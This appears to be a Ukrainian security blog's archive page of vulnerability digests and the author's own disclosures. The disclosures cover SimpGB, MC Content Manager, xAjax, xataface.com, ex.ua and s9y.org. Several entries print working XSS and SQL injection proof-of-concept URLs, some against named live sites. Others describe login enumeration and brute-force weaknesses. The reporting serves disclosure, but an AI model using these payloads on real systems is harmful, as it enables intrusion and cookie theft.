Архів для категорії 'Уразливості'

Добірка уразливостей

15:10 26.01.2011

В даній добірці уразливості в веб додатках:

  • Sun Java Runtime CMM readMabCurveData Remote Code Execution Vulnerability (деталі)
  • Sun Java Runtime Environment MixerSequencer Invalid Array Index Remote Code Execution Vulnerability (деталі)
  • Sun Java Runtime Environment JPEGImageReader stepX Remote Code Execution Vulnerability (деталі)
  • Free Simple CMS path sanitization errors (деталі)
  • Sun Java Runtime Environment Trusted Methods Chaining Remote Code Execution Vulnerability (деталі)
  • Sun Java Runtime Environment MIDI File metaEvent Remote Code Execution Vulnerability (деталі)
  • Sun Java JDK/JRE Unpack200 Buffer Overflow Vulnerability (деталі)
  • Reflected XSS in Atmail WebMail < v6.2.0 (деталі)
  • TimeTrack 1.2.4 Joomla Component Multiple SQL Injection Vulnerabilities (деталі)
  • BSI Hotel Booking System Admin Login Bypass Vulnerability (деталі)

Численні уразливості в SimpGB

15:02 25.01.2011

17.11.2010

У липні, 15.07.2010, я знайшов Cross-Site Scripting, Brute Force, Insufficient Anti-automation та Abuse of Functionality уразливості в SimpGB. Дані уразливості я виявив на різних сайтах, де використовується даний веб додаток. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в SimpGB.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатку.

25.01.2011

XSS:

POST запит на сторінці http://site/guestbook.php в параметрах poster, postingid та location в функції Preview. Якщо в гостьовій книзі використовується капча, то для атаки необхідний робочий код капчі. Або через GET запит:

http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview
http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&poster=1&input_text=111111111111111111111111111111&preview=preview
http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=1&location=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview

Brute Force:

http://site/admin/index.php

Insufficient Anti-automation:

http://site/admin/pwlost.php

В даному функціоналі немає захисту від автоматизованих запитів.

Abuse of Functionality:

http://site/admin/pwlost.php

В даному функціоналі можна виявляти логіни.

Уразливі SimpGB v1.49.02 та попередні версії.

Добірка уразливостей

15:19 24.01.2011

В даній добірці уразливості в веб додатках:

  • OpenJDK vulnerabilities (деталі)
  • Sun Java Runtime Environment JPEGImageDecoderImpl Remote Code Execution Vulnerability (деталі)
  • Sun Java Runtime Environment JPEGImageEncoderImpl Remote Code Execution Vulnerability (деталі)
  • SQL Injection and XSS vulnerabilities in CubeCart version 4.3.3 (деталі)
  • Sun Java Runtime Environment Mutable InetAddress Socket Policy Violation Vulnerability (деталі)
  • Sun Java Runtime Environment XNewPtr Remote Code Execution Vulnerability (деталі)
  • Sun Java Runtime RMIConnectionImpl Privileged Context Remote Code Execution Vulnerability (деталі)
  • New drupal6 packages fix several vulnerabilities (деталі)
  • SQL injection vulnerability in e107 (деталі)
  • SQL injection vulnerability in e107 (деталі)

Нові уразливості в MC Content Manager

19:14 22.01.2011

16.11.2010

У липні, 25.07.2010, я знайшов Full path disclosure та SQL Injection уразливості в системі MC Content Manager (це українська комерційна CMS). Які я виявив на декількох сайтах на даному движку. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в MC Content Manager.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

22.01.2011

Full path disclosure:

http://site/article.php?root=a

SQL Injection:

http://site/article.php?root=-1%20and%20version()=4

Уразливі лише не самі нові версії MC Content Manager.

Добірка уразливостей

22:45 21.01.2011

В даній добірці уразливості в веб додатках:

  • CompleteFTP Server v 4.x “PORT” command Remote DOS exploit (деталі)
  • Joomla Component Clantools version 1.2.3 Multiple Blind SQL Injection Vulnerabilities (деталі)
  • Joomla Component Clantools version 1.5 Blind SQL Injection Vulnerability (деталі)
  • Scientific Atlanta DPC2100 WebSTAR Cable Modem vulnerabilities (деталі)
  • XSS in Horde Application Framework <=3.3.8, icon_browser.php (деталі)
  • Security problems in Zenphoto version 1.3 (деталі)
  • Webby Webserver v1.01 - Buffer overflow vulnerability with overwritten structured exception handler (SEH) (деталі)
  • New typo3-src packages fix regression (деталі)
  • Joomla Component Aardvertiser 2.1 free Blind SQL Injection Vulnerability (деталі)
  • Multiple Vulnerabilities in Cisco Network Building Mediator (деталі)

Уразливості на xataface.com

16:03 21.01.2011

08.06.2010

У листопаді, 04.11.2009, я знайшов Cross-Site Scripting та Full path disclosure уразливості на проекті http://xataface.com. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

21.01.2011

XSS:

http://xataface.com/admin.php?-table=pages&-search=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&-action=search_index

Full path disclosure:

Змінна DATAFACE_PATH в тілі кожної сторінки сайта.

Дані уразливості вже виправлені.

Уразливості на www.ex.ua

15:01 20.01.2011

04.06.2010

У жовтні, 31.10.2009, я знайшов Abuse of Functionality, Insufficient Anti-automation та Brute Force уразливості на проекті http://www.ex.ua (файлообмінник). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

20.01.2011

Abuse of Functionality:

На сторінці http://www.ex.ua/register в полі Логін можна визначити логіни користувачів в системі. Це також можна зробити через GET запит. Дана уразливість дозволяє провести Login Enumeration атаку.

http://www.ex.ua/r_check_login?login=123

Insufficient Anti-automation:

Враховучи, що дана функція немає захисту від автоматизованих атак, це дозволяє проводити автоматизоване виявлення логінів в системі. В подальшому виявлені логіни можуть бути використані для визначення паролів користувачів системи.

Brute Force:

На сторінці http://www.ex.ua/login можливе визначення паролів користувачів. В перші декілька спроб капча відсутня, лише потім вона з’являється, що може використовуватися для атаки.

Дані уразливості досі не виправлені.

Уразливості в xAjax та xajax_jquery_plugin

19:05 19.01.2011

06.11.2010

У липні, 07.07.2010, я знайшов Cross-Site Scripting та Full path disclosure уразливості в xAjax та xajax_jquery_plugin. Які я виявив на різних сайтах, що використовують дані веб додатки, в тому числі на деяких сайтах на MC Content Manager. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатків.

19.01.2011

XSS:

http://site/cms/’;alert(document.cookie);/*

Це DOM Based XSS. Дана уразливість зокрема має місце в MC Content Manager (що використовує xAjax).

Full path disclosure:

http://site/xajax_core/legacy.inc.php
http://site/xajax_core/xajax_lang_de.inc.php
http://site/xajax_core/xajax_lang_nl.inc.php
http://site/xajax_core/plugin_layer/xajaxCallableObjectPlugin.inc.php
http://site/xajax_core/plugin_layer/xajaxDefaultIncludePlugin.inc.php
http://site/xajax_core/plugin_layer/xajaxEventPlugin.inc.php
http://site/xajax_core/plugin_layer/xajaxFunctionPlugin.inc.php
http://site/xajax_core/plugin_layer/xajaxScriptPlugin.inc.php
http://site/xajax_core/plugin_layer/xajaxDefaultRequestProcessorPlugin.inc.php
http://site/jquery.php
http://site/demo.php

Файли jquery.php та demo.php відносяться до xajax_jquery_plugin. Дані уразливості мають місце на різних веб сайтах та у різних веб додатках, що використовують xAjax та xajax_jquery_plugin.

Уразливі потенційно всі версії xAjax. Уразливі всі версії xajax_jquery_plugin.

Добірка уразливостей

22:32 18.01.2011

В даній добірці уразливості в веб додатках:

  • HP Systems Insight Manager (SIM) for HP-UX, Linux, and Windows, Remote Unauthorized Access to Data (деталі)
  • iBoutique.MALL 1.2 XSS vuln (деталі)
  • NetArtMEDIA Real Estate Portal v2.0 XSS vuln. + NetArtMEDIA lfi (деталі)
  • Open Classifieds version 1.7.0.2 XSS Vuln (деталі)
  • HP LoadRunner Agent on Windows, Remote Unauthenticated Arbitrary Code Execution (деталі)
  • HP Mercury LoadRunner Agent Trusted Input Remote Code Execution Vulnerability (деталі)
  • HP Performance Center Agent on Windows, Remote Unauthenticated Arbitrary Code Execution (деталі)
  • New smbind packages fix sql injection (деталі)
  • chillyCMS Multiple Vulnerabilities (деталі)
  • XSS bug in US Robotics firmware USR5463-v0_06.bin (деталі)

Нова уразливість на s9y.org

15:03 18.01.2011

03.06.2010

У жовтні, 30.10.2009, я знайшов SQL Injection уразливість на сайті http://s9y.org. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливість на s9y.org.

Детальна інформація про уразливість з’явиться пізніше.

18.01.2011

SQL Injection:

http://s9y.org/index.php?node=-1′%20or%20version()%3E’5

Дана уразливість вже виправлена.